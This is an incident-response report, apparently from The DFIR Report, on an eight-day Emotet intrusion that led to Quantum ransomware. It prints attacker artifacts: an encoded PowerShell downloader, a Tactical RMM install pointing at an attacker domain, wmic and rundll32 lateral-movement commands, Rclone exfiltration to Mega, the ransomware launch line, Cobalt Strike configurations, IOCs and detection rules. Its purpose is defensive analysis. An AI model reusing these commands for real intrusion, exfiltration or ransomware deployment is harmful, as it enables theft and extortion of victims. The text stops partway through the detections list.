Emotet Strikes Again - LNK File Leads to Domain Wide Ransomware By editor Published: 2022-11-28 · Archived: 2026-04-06 00:03:16 UTC In June of 2022, we observed a threat actor gaining access to an environment via Emotet and operating over a eight day period. During this time period, multiple rounds of enumeration and lateral movement occurred using Cobalt Strike. Remote access tools were used for command and control, such as Tactical RMM and Anydesk. The threat actors final actions included data exfiltration using Rclone and domain wide deployment of Quantum Ransomware. We have observed similar traits in previous cases where Emotet and Quantum were seen. Case Summary The intrusion began when a user double clicked a LNK file, which then executed encoded Powershell commands to download an Emotet DLL onto the computer. Once executed, Emotet setup a Registry Run Key to maintain persistence on the beachhead host. Emotet, then proceeded to execute a short list of discover commands using the Windows utilities systeminfo, ipconfig, and nltest targeting the network’s domain controllers. These commands would go on to be repeated daily by the Emotet process. Around one and one-half hours after execution, Emotet began sending spam emails, mailing new malicious attachments to continue spreading. Similar activity continued over the second day, but on the third day of the incident, Emotet dropped a Cobalt Strike executable beacon onto the beachhead host. Using the Cobalt Strike beacon, the threat actors began conducting a new round of discovery activity. Windows net commands were run, targeting domain groups and computers, nltest was executed again, and they also used tasklist and ping to investigate a remote host. The threat actor then moved laterally to a workstation. They first attempted this action using a PowerShell beacon and a remote service on the host, but while the script did execute on the remote host, it appeared to fail to connect to the command and control server. Next, they proceeded to transfer a beacon executable over SMB to the remote host’s ProgramData directory. This beacon was then successfully executed via WMI and connected successfully to the threat actors server. Once on this new host the threat actors proceeded to run the net commands to review the Domain Administrators group again. They then proceeded to dump credentials from the LSASS process on the host. With some further process injection they then began to enumerate SMB shares across the environment and on finding a primary file server reviewed several documents present on the server. This Cobalt Strike server stopped communicating shortly there after. https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 1 of 38 On the fourth day of the intrusion, Emotet dropped a new Cobalt Strike beacon. Again, some net command discovery was run for domain admins and domain controller servers. A flight of netlogon authentications were observed from the beachhead host to the domain controller as a possible attempt at exploiting the domain controller. The threat actors, however, proceeded along a more traditional path, using SMB file transfers and remote services to move laterally across domain controllers and several other servers in the environment using Cobalt Strike beacon DLL’s. On the domain controller, the threat actors conducted further discovery tasks running find.bat and p.bat , which executed AdFind active directory discovery and performed a ping sweep across the environment. On one of the other targeted servers, the threat actors deployed Tactical RMM, a remote management agent, for additional access and persistence in the environment. From this server, the threat actors were observed using Rclone to exfiltrate data from a file share server in the environment. The Mega.io service was the location the stolen data was sent. On the fifth day of the intrusion, the threat actors appeared again to try and exfiltrate some data from the mail server again using Rclone but this appeared to fail and the threat actors did not try to resolve the issue. After this the threat actors went silent until the eighth and final day of the intrusion. On the eighth day of the intrusion the threat actor accessed the environment using Tactical RMM to deploy Anydesk on the compromised host. After establishing a connection using Anydesk, the threat actors then dropped SoftPerfect’s Network Scanner and ran it to identify hosts across the environment. From there, the threat actors began connecting to other hosts via RDP, including the a backup server. After choosing a new server and connecting via RDP, the threat actors dropped Powertool64.exe and dontsleep.exe in preparation for their final actions. Finally, locker.dll and a batch file 1.bat were dropped on the host and the batch file was executed beginning the Quantum rasomware deployment to all hosts over SMB. From initial intrusion to ransomware deployment, 154 hours passed, over eight days. After ransomware deployment, the threat actors remained connected and did RDP to a few other servers and executed ProcessHacker.exe and a net command. With no other activity taking place, we assess that this was likely the threat actors confirming successful deployment of the ransomware payload across the network. Services We offer multiple services including a Threat Feed service which tracks Command and Control frameworks such as Cobalt Strike, BumbleBee, Covenant, Metasploit, Empire, PoshC2, etc. More information on this service and others can be found here. Both of the Cobalt Strike servers in this case were on our Threat Feed (days to months) in advance of this intrusion. We also have artifacts and IOCs available from this case such as pcaps, memory captures, files, event logs including Sysmon, Kape packages, and more, under our Security Researcher and Organization services. https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 2 of 38 Timeline https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 3 of 38 https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 4 of 38 Report Lead: @iiamaleks Analysis and reporting: @samaritan_o, and @yatinwad Initial Access Initial access took the form of an LNK file delivered to a victim through a MalSpam campaign. https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 5 of 38 https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 6 of 38 The Powershell script embedded within the LNK is a Base64 encoded script with various components split into different variables for obfuscation purposes. The script will decode itself rather than depend on Powershell’s built-in ability to execute encoded scripts. ..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "&{'p8ArwZsj8ZO+Zy/dHPeI+siGhbaxtEhzw VsLWVuZXJnaWFraS5nci93cC1pbmNsdWRlcy9JZHJWS09HWU1Rb2R1N0lsT0loLyIsImh0dHA6Ly9kcmVjaHNsZXJzdGFtbXRpc2N vIiwiaHR0cDovL2RpbHNybC5jb20vcGhvbmUvcGZpcDVtLyIpOyR0PSJuZldGUSI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAt ZjtSZWdzdnIzMi5leGUgIiRkXGp4S1BJck1GeEouT09mIjticmVha30gY2F0Y2ggeyB9fQ==';$KOKN='ICBXcml0ZS1Ib3N0ICJB KN=$KOKN+$BxQ;$GBUus=$KOKN;$xCyRLo=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase The Powershell script, when double clicked (executed), will attempt to connect to a set of domains containing the Emotet malware. Upon successful download of the Emotet malware, the PowerShell script will write it to a temporary directory and execute the payload via regsvr32.exe . https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 7 of 38 It is interesting to note, the LNK identifies the machine it was created on through the NetBIOS name of black-dog and a MAC Address beginning with 08:00:27 indicating a system running on Virtualbox. Machine ID: black-dog MAC Address: 08:00:27:c6:74:5d MAC Vendor: PCS SYSTEMTECHNIK Creation: 2022-05-12 15:33:49 Execution Once the PowerShell script from the LNK file executed successfully, Emotet began execution. Emotet will initially copy itself to a randomly named folder in the users temporary folder. https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 8 of 38 Multiple instances of Emotet spawning itself was observed over a period of three days. Almost all the instances of Emotet included three enumeration commands executed: systeminfo ipconfig /all nltest /dclist: Towards the third and fourth day of the intrusion, Cobalt Strike was dropped to disk as a PE executable and executed. This access was used to perform enumeration and move laterally to other hosts. The following diagram aims to provide an illustration of the execution chain with multiple instances of Emotet leading to Cobalt Strike. https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 9 of 38 Persistence The Emotet malware has used various persistence methods over time, an example can be seen here. On the first day, Emotet established persistence via a run key. As we can see, the regsvr32.exe Windows’s native utility was used to launch the Emotet DLL. https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 10 of 38 After moving to the hands on keyboard phase of the intrusion, the threat actors proceeded to deploy several remote management tools across the environment. Tactical RMM was the first tool chosen for deployment. Tactical RMM is a remote management software platform that uses a combination of agents to allow for remote management and access to systems. The file 17jun.exe, was deployed into the programdata folder on one of the servers. This was then executed by the threat actors and resulted in the installation of the main RMM agent. The install completed with the following command. "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m install --api https://api.floppasoftware[.]com -- A service was also created for the agent. https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 11 of 38 Event 7045 A service was installed in the system. Service Name: TacticalRMM Agent Service Service File Name: "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m svc Service Type: user mode service Service Start Type: auto start Service Account: LocalSystem Along with the tacticalrmm.exe client, a second executable called meshagent.exe, was installed to handle remote session interaction, and a separate service was created for that agent. Event 7045 A service was installed in the system. Service Name: Mesh Agent Service File Name: "C:\Program Files\Mesh Agent\MeshAgent.exe" Service Type: user mode service Service Start Type: auto start Service Account: LocalSystem On the final day of the intrusion, the threat actors added AnyDesk to the same server running Tactical RMM, providing an additional means of access prior to the deployment of ransomware. https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 12 of 38 Event 7045 A service was installed in the system. Service Name: AnyDesk Service Service File Name: "C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service Service Type: user mode service Service Start Type: auto start Service Account: LocalSystem Privilege Escalation  We suspect a failed ZeroLogon exploit was attempted against a domain controller, originating from the beachhead host with Cobalt Strike running on it. One indicator is the ‘mimikatz’ string in the Netlogon event that is used by the Mimikatz Zerologon implementation. During a period of a few seconds, multiple NetrServerReqChallenge and NetrServerAuthenticate2 methods in the traffic from a single source were observed, this is one of the indicators of a Zerologon attempt. https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 13 of 38 Defense Evasion Process Injection The threat actor was observed process injecting into legitimate process and using them to execute their own tasks on the system, this can be seen from Winlogon connecting to a domain associated with a Cobalt Strike server and removing files from the system. The specific mechanism used to inject into a foreign process, was injecting arbitrary code into its memory space, and executing it as a remotely created thread. This occurred from rundll32.exe, which was previously used to execute and run Cobalt Strike. The following table summarizes the processes used for injection during this case: Injected Process Name Injection Payload C:\Windows\system32\winlogon.exe Cobalt Strike C:\Windows\System32\RuntimeBroker.exe Cobalt Strike C:\Windows\System32\svchost.exe Cobalt Strike C:\Windows\System32\taskhostw.exe Cobalt Strike C:\Windows\system32\dllhost.exe Cobalt Strike PowerTool https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 14 of 38 PowerTool was observed, dropped and executed on the server used to deploy the ransomware payload. This tool has the ability to kill a process, delete its process file, unload drivers, and delete the driver files. It has been reportedly used by several ransomware groups to aid in their operations [1][2][3][4]. As a byproduct of execution, PowerTool will drop a driver to disk and load it into the system. Driver Signature Name: 北京华林保软件技术有限公司 Indicator Removal The threat actor was observed deleting files that had been dropped to disk. Credential Access Process access to LSASS was observed, likely to dump credentials from a process that was injected with Cobalt Strike. The Granted Access level matches know indicators for Mimikatz with an access value of 0x1010 (4112), as we covered in a prior report. We also observed a Cobalt Strike executable request access level of 0x0040 (64) to LSASS, as well indicating other credential access tools may have been in use by the threat actor. Discovery During the initial Emotet execution, three automated discovery commands were observed. These were then repeated, seen occurring once a day from the Emotet host. systeminfo ipconfig /all nltest /dclist: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 15 of 38 Multiple commands responsible for enumerating Active Directory groups, domain joined computers, and domain trusts, were executed via Cobalt Strike on the beachhead. whoami /groups net group /domain net group "domain computers" /domain net group /domain "Domain controllers" net group "domain admins" /domain nltest /trusted_domains The threat actor was observed querying a non-existent group Domain controller, followed by a command correcting the mistake that queried the group Domain controllers . net group /domain "Domain controller" net group /domain "Domain controllers" A ping command issued to a user workstation and a domain controller were observed moments before lateral movement was attempted. ping COMPUTER.REDACTED.local Invoke-ShareFinder was observed being used via Powershell in the environment from an injected process with Cobalt Strike: In addition to the Invoke-ShareFinder command, other functions that were used by the script were also observed. The remnants of Invoke-ShareFinder could also be seen on the network through the consistent querying of “ADMIN$” and “C$” shares for each host over a short period of time. In addition to these shares, a few shares from the file servers were also accessed. https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 16 of 38 Once on the domain controller, two batch files were run. The first find.bat was used to run AdFind.exe for Active Directory discovery. find.exe -f "objectcategory=computer" find.exe -f "(objectcategory=organizationalUnit)" find.exe -subnets -f (objectCategory=subnet) find.exe -f "(objectcategory=group)" find.exe -gcb -sc trustdmp The second script, p.bat, was run to sweep the network using ping, looking for network connectivity and online hosts. https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 17 of 38 On the final day, prior to ransom deployment, the threat actor also dropped netscan.exe on the server, and executed it from the Tactical RMM meshagent.exe session. C:\Windows\System32\mstsc mstsc.exe /v:IP_ADDRESS_1 C:\Windows\System32\mstsc mstsc.exe /v:IP_ADDRESS_2 C:\Windows\SysWOW64\explorer.exe "C:\Windows\SysWOW64\explorer.exe" \\IP_ADDRESS_1\C$ C:\Windows\SysWOW64\explorer.exe "C:\Windows\SysWOW64\explorer.exe" \\IP_ADDRESS_2\C$ Lateral Movement Cobalt Strike Remote Service Creation The threat actor was observed creating remote services in order to execute beacon DLL files transferred via SMB as SYSTEM on remote hosts. C:\Windows\System32\cmd.exe /c rundll32.exe C:\ProgramData\x86.dll, StartA WMI In another instance, an executable Cobalt Strike beacon was copied via SMB to a target machine, and then executed via WMI. wmic /node:IP_Address process call create "cmd.exe /c start C:\Progradata\sc_https_x64.exe" Remote Desktop Lastly, traces of RDP (Remote Desktop Protocol) connections were discovered on multiple compromised hosts utilized for lateral movement on the final day of the intrusion and during the ransomware deployment. https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 18 of 38 Collection On the third day of the intrusion, after moving laterally, the threat actors began to review sensitive documents stored on network shares, including revenue, insurance, and password storage documents. These documents were again reviewed by the threat actor on the final day of the intrusion. Later the threat actor viewed the stolen files off network, observed by triggered canary tokens, which revealed connections from an AWS EC2 instance. Command and Control Emotet The Emotet loader pulled the main second stage payload from the following domains: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 19 of 38 hxxps://descontador[.]com[.]br hxxps://www.elaboro[.]pl hxxps://el-energiaki[.]gr hxxp://drechslerstammtisch[.]de hxxp://dhnconstrucciones[.]com[.]ar hxxp://dilsrl[.]com The second stage loader had multiple IP addresses in its configuration to attempt connections to: 103.159.224.46 103.75.201.2 119.193.124.41 128.199.225.17 131.100.24.231 139.59.60.88 144.217.88.125 146.59.226.45 149.56.131.28 159.89.202.34 165.22.211.113 165.227.166.238 178.128.82.218 209.126.98.206 213.32.75.32 37.187.115.122 45.226.53.34 45.55.134.126 46.55.222.11 51.210.176.76 51.254.140.238 54.37.70.105 82.223.82.69 91.207.181.106 92.114.18.20 94.23.45.86 96.125.171.16 Cobalt Strike The following Cobalt Strike C2 servers were observed being used. Both HTTP and HTTPS were observed to be used. 139.60.161.167 (survefuz[.]com) 139.60.160.18 (juanjik[.]com) https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 20 of 38 139.60.161.167 (survefuz[.]com) JA3s: 211897664d51cffdfd7f78d684602ecc JA3: a0e9f5d64349fb13191bc781f81f42e1 Certificate: 03:4e:01:cb:d0:d4:40:24:ad:e0:cd:81:9f:00:44:0f:1e:de Not Before: May 24 11:25:15 2022 GMT Not After: Aug 22 11:25:14 2022 GMT Issuer Org: Let's Encrypt Subject Common: survefuz[.]com Public Algorithm: id-ecPublicKey 139.60.160.18 (juanjik[.]com) JA3s: 211897664d51cffdfd7f78d684602ecc JA3: a0e9f5d64349fb13191bc781f81f42e1 Certificate: 04:ea:aa:59:1e:c6:50:6e:d3:70:d4:24:50:f0:a5:30:9a:e6 Not Before: Jun 14 17:38:08 2022 GMT Not After: Sep 12 17:38:07 2022 GMT Issuer Org: Let's Encrypt Subject Common: juanjik[.]com Public Algorithm: rsaEncryption The following are the Cobalt Strike configurations observed: 139.60.161.167 (survefuz[.]com) { "beacontype": [ "HTTP" ], "sleeptime": 45000, "jitter": 37, "maxgetsize": 1403644, "spawnto": "AAAAAAAAAAAAAAAAAAAAAA==", "license_id": 206546002, "cfg_caution": false, "kill_date": null, "server": { "hostname": "survefuz[.]com", "port": 80, "publickey": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCqoyVkBHx713LeUHmw7FAozt15LWTMgX1nCLSXECllryU }, "host_header": "", "useragent_header": null, "http-get": { "uri": "/jquery-3.3.1.min.js", "verb": "GET", https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 21 of 38 "client": { "headers": null, "metadata": null }, "server": { "output": [ "print", "append 1522 characters", "prepend 84 characters", "prepend 3931 characters", "base64url", "mask" ] } }, "http-post": { "uri": "/jquery-3.3.2.min.js", "verb": "POST", "client": { "headers": null, "id": null, "output": null } }, "tcp_frame_header": "AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA "crypto_scheme": 0, "proxy": { "type": null, "username": null, "password": null, "behavior": "Use IE settings" }, "http_post_chunk": 0, "uses_cookies": true, "post-ex": { "spawnto_x86": "%windir%\\syswow64\\dllhost.exe", "spawnto_x64": "%windir%\\sysnative\\dllhost.exe" }, "process-inject": { "allocator": "NtMapViewOfSection", "execute": [ "CreateThread 'ntdll!RtlUserThreadStart'", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread" ], https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 22 of 38 "min_alloc": 17500, "startrwx": false, "stub": "yl5rgAigihmtjA5iEHURzg==", "transform-x86": [ "prepend '\\x90\\x90'" ], "transform-x64": [ "prepend '\\x90\\x90'" ], "userwx": false }, "dns-beacon": { "dns_idle": null, "dns_sleep": null, "maxdns": null, "beacon": null, "get_A": null, "get_AAAA": null, "get_TXT": null, "put_metadata": null, "put_output": null }, "pipename": null, "smb_frame_header": "AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA "stage": { "cleanup": true }, "ssh": { "hostname": null, "port": null, "username": null, "password": null, "privatekey": null } } 139.60.160.18:80 (juanjik[.]com) { "spawnto": "AAAAAAAAAAAAAAAAAAAAAA==", "dns_beacon": {}, "smb_frame_header": "AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA "post_ex": { "spawnto_x64": "%windir%\\sysnative\\dllhost.exe", "spawnto_x86": "%windir%\\syswow64\\dllhost.exe" https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 23 of 38 }, "stage": { "cleanup": true }, "process_inject": { "stub": "yl5rgAigihmtjA5iEHURzg==", "transform_x64": [ "prepend '\\x90\\x90'" ], "transform_x86": [ "prepend '\\x90\\x90'" ], "startrwx": false, "min_alloc": "17500", "userwx": false, "execute": [ "CreateThread 'ntdll!RtlUserThreadStart'", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread" ], "allocator": "NtMapViewOfSection" }, "uses_cookies": true, "http_post_chunk": "0", "ssh": {}, "maxgetsize": "1403644", "proxy": { "behavior": "Use IE settings" }, "tcp_frame_header": "AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA "server": { "publickey": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCbFjn9w4cE3slYf3jYqTw3S+6HxAGZd3cMpTqKnDsmGAm "port": "443", "hostname": "juanjik[.]com" }, "beacontype": [ "HTTPS" ], "license_id": "206546002", "jitter": "37", "sleeptime": "45000", "http_get": { "server": { "output": [ "print", https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 24 of 38 "append 1522 characters", "prepend 84 characters", "prepend 3931 characters", "base64url", "mask" ] }, "client": { "metadata": [], "headers": [] }, "verb": "GET", "uri": "/jquery-3.3.1.min.js" }, "cfg_caution": false, "host_header": "", "crypto_scheme": "0", "http_post": { "client": { "output": [], "id": [], "headers": [] }, "verb": "POST", "uri": "/jquery-3.3.2.min.js" } } 139.60.160.18:443 (juanjik[.]com) { "spawnto": "AAAAAAAAAAAAAAAAAAAAAA==", "dns_beacon": {}, "smb_frame_header": "AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA "post_ex": { "spawnto_x64": "%windir%\\sysnative\\dllhost.exe", "spawnto_x86": "%windir%\\syswow64\\dllhost.exe" }, "stage": { "cleanup": true }, "process_inject": { "stub": "yl5rgAigihmtjA5iEHURzg==", "transform_x64": [ "prepend '\\x90\\x90'" https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 25 of 38 ], "transform_x86": [ "prepend '\\x90\\x90'" ], "startrwx": false, "min_alloc": "17500", "userwx": false, "execute": [ "CreateThread 'ntdll!RtlUserThreadStart'", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread" ], "allocator": "NtMapViewOfSection" }, "uses_cookies": true, "http_post_chunk": "0", "ssh": {}, "maxgetsize": "1403644", "proxy": { "behavior": "Use IE settings" }, "tcp_frame_header": "AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA "server": { "publickey": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCbFjn9w4cE3slYf3jYqTw3S+6HxAGZd3cMpTqKnDsmGAm "port": "80", "hostname": "juanjik[.]com" }, "beacontype": [ "HTTP" ], "license_id": "206546002", "jitter": "37", "sleeptime": "45000", "http_get": { "server": { "output": [ "print", "append 1522 characters", "prepend 84 characters", "prepend 3931 characters", "base64url", "mask" ] }, "client": { https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 26 of 38 "metadata": [], "headers": [] }, "verb": "GET", "uri": "/jquery-3.3.1.min.js" }, "cfg_caution": false, "host_header": "", "crypto_scheme": "0", "http_post": { "client": { "output": [], "id": [], "headers": [] }, "verb": "POST", "uri": "/jquery-3.3.2.min.js" } } Tactical RMM Agent The threat actor dropped a Tactical RMM Agent on one of the servers as an alternative command and control avenue to access the network. During the installation of the software, the following command was observed: "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m install --api https://api.floppasoftware[.]com -- This command reveals the floppasoftware.com domain used by the threat actor for the remote management of Tactical RMM Agent. This domain was registered very close to the timeline of this incident. A domain registered to be used with Tactical RMM Agent will have both an api and mesh subdomain, in this case api.floppasoftware[.]com and mesh.floppasoftware[.]com . These were both hosted on the same server IP: 212.73.150.62. In addition, during the execution of Tactical RMM Agent, the software will reach out to a centralized domain in order to retrieve the current public IP address in use: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 27 of 38 icanhazip.tacticalrmm.io AnyDesk On the final day of the intrusion, AnyDesk was deployed on the server they had previously installed Tactical RMM on. Using this RMM agent they proceeded to install AnyDesk on the host. The following process activity was observed from meshagent.exe. MeshAgent.exe -kvm1 - Initiating Process File Name, column 6, row 12 "MeshAgent.exe" -b64exec cmVxdWlyZSgnd2luLWNvbnNvbGUnKS5oaWRlKCk7cmVxdWlyZSgnd2luLWRpc3BhdGNoZXInKS5j The decoded base 64 content reveals commands for console access and connect actions. This is then followed by the following process flow: Once downloaded and installed, the threat actor initiated a connection to the AnyDesk host. https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 28 of 38 Client-ID: 752733537 (FPR: 27ac27e2c9ed) Logged in from 84.17.49.114:1249 Exfiltration Also seen in our last report on Emotet, threat actors leveraged Rclone to exfiltrate data to Mega (Mega.nz) storage services. rclone.exe copy "\\SERVER.domain.name\path" mega:1 -q --ignore-existing --auto-confirm --multi-threa rclone.exe copy "\\SERVER.domain.name\path" mega:2 -q --ignore-existing --auto-confirm --multi-threa From the rclone.conf file, the threat actors left the details of the remote account being used. Brerinit@tempmail.de https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 29 of 38 With the help of Netflow, we identified that at least ~250MB worth of data was exfiltrated out of the environment. Impact Spam Email During the first two days, Emotet sent outbound spam emails over SMTP: The following is an example of the SMTP traffic for sending the email, along with an extracted EML that was sent with an attached XLS: Ransomware Towards the last day of the intrusion, the threat actor made their preparations to deploy ransomware to the domain. They started by connecting to a new server via RDP from the server they just used Tactical RMM to deploy https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 30 of 38 Anydesk. Once establishing the RDP connection, they deployed Powertool64.exe, likely to prevent intervention by any security tools and launched the software Don’t Sleep. Don’t Sleep has the capability to keep the computer from being shutdown and the user from being signed off. This was likely done to ensure nothing will interfere with the propagation of the ransomware payload. Finally, with Don’t Sleep running, the threat actor executed a batch script named “1.bat“. The script invoked the main ransomware payload, locker.dll, and passed a list of all the computers in the domain to the target parameter. https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 31 of 38 rundll32.exe locker.dll,run /TARGET=\\HOST1.DOMAIN.NAME\C$ /TARGET=\\HOST2.DOMAIN.NAME\C$ /TARGET=\\H The executable began to encrypt all the targeted hosts in the environment and dropped a ransom note: README_TO_DECRYPT.html https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 32 of 38 After the invocation of the ransomware payload, about a minute later, the threat actor launched Process Hacker. We believe this was to monitor the execution of the ransomware payload. All systems in the domain were encrypted and presented with a ransom message. https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 33 of 38 Indicators Atomic Emotet Deployment Domains descontador[.]com[.]br www.elaboro[.]pl el-energiaki[.]gr drechslerstammtisch[.]de dhnconstrucciones[.]com[.]ar dilsrl[.]com Emotet C2 Servers 103.159.224.46 103.75.201.2 119.193.124.41 128.199.225.17 131.100.24.231 139.59.60.88 144.217.88.125 146.59.226.45 149.56.131.28 159.89.202.34 165.22.211.113 165.227.166.238 178.128.82.218 209.126.98.206 213.32.75.32 https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 34 of 38 37.187.115.122 45.226.53.34 45.55.134.126 46.55.222.11 51.210.176.76 51.254.140.238 54.37.70.105 82.223.82.69 91.207.181.106 92.114.18.20 94.23.45.86 96.125.171.165 Cobalt Strike 139.60.161.167 (survefuz[.]com) 139.60.160.18 (juanjik[.]com) Tactical RMM Agent api.floppasoftware[.]com mesh.floppasoftware[.]com 212.73.150.62 Computed K-1 06.13.2022.lnk de7c4da78a6cbba096e32e5eecb00566 02b4f495e9995cc2251c19cd9984763f52122951 1bf9314ae67ab791932c43e6c64103b1b572a88035447dae781bffd21a1187ad 17jun.exe 0ea68856c4f56f4056502208e97e9033 b80c987c8849bf7905ea8f283b79d98753e3c15a 41e230134deca492704401ddf556ee2198ef6f32b868ec626d9aefbf268ab6b1 dontsleep.exe 50cc3a3bca96d7096c8118e838d9bc16 b286b58ed32b6df4ecdb5df86d7d7d177bb7bfaf f8cff7082a936912baf2124d42ed82403c75c87cb160553a7df862f8d81809ee locker.dll d2df4601c8d43e655163c0b292bc4cc9 f6727d5d04f2728a3353fbd45d7b2cb19e98802c 6424b4983f83f477a5da846a1dc3e2565b7a7d88ae3f084f3d3884c43aec5df6 netscan.exe 27f7186499bc8d10e51d17d3d6697bc5 https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 35 of 38 52332ce16ee0c393b8eea6e71863ad41e3caeafd 18f0898d595ec054d13b02915fb7d3636f65b8e53c0c66b3c7ee3b6fc37d3566 rclone.exe 22bbe1747933531e9c240e0db86268e2 c2a8776e21403eb00b38bfccd36d1c03dffb009e 53ae3567a34097f29011d752f1d3afab8f92beb36a8d6a5df5c1d4b12edc Behavioral The threat actor delivered Emotet via a Emotet loader in the form of a LNK file responsible for dropp Tactical RMM Agent was installed by the threat actor on a server to ensure remote access (17jun.exe) Data was exfiltrated to Mega cloud service via Rclone (rclone.exe). Network mapping was performed using SoftPerfect Network Scanner (netscan.exe) followed by Quantum ran The threat actor kept the remote desktop session alive by running a program to keep the session activ Detections Network The DFIR Report Cobalt Strike 139.60.160.18 The DFIR Report Cobalt Strike 139.60.161.167 ET Threatview.io High Confidence Cobalt Strike C2 IP group 1 ET POLICY SMB2 NT Create AndX Request For an Executable File ET POLICY SMB Executable File Transfer ET RPC DCERPC SVCCTL - Remote Service Control Manager Access ET INFO Observed External IP Lookup Domain (icanhazip .com in TLS SNI)t ET JA3 HASH - Possible Rclone Client Response (Mega Storage) ET POLICY HTTP POST to MEGA Userstorage ET POLICY SMB Executable File Transfer ET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement ET POLICY SMB2 NT Create AndX Request For an Executable File ET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software) ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection ET USER_AGENTS AnyDesk Remote Desktop Software User-Agent ET CNC Feodo Tracker Reported CnC Server group 1 ET CNC Feodo Tracker Reported CnC Server group 14 ET CNC Feodo Tracker Reported CnC Server group 15 ET CNC Feodo Tracker Reported CnC Server group 17 ET CNC Feodo Tracker Reported CnC Server group 19 ET CNC Feodo Tracker Reported CnC Server group 2 ET CNC Feodo Tracker Reported CnC Server group 20 ET CNC Feodo Tracker Reported CnC Server group 21 https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ Page 36 of 38 ET CNC Feodo Tracker Reported CnC Server group 23 ET CNC Feodo Tracker Reported CnC Server group 24 ET CNC Feodo 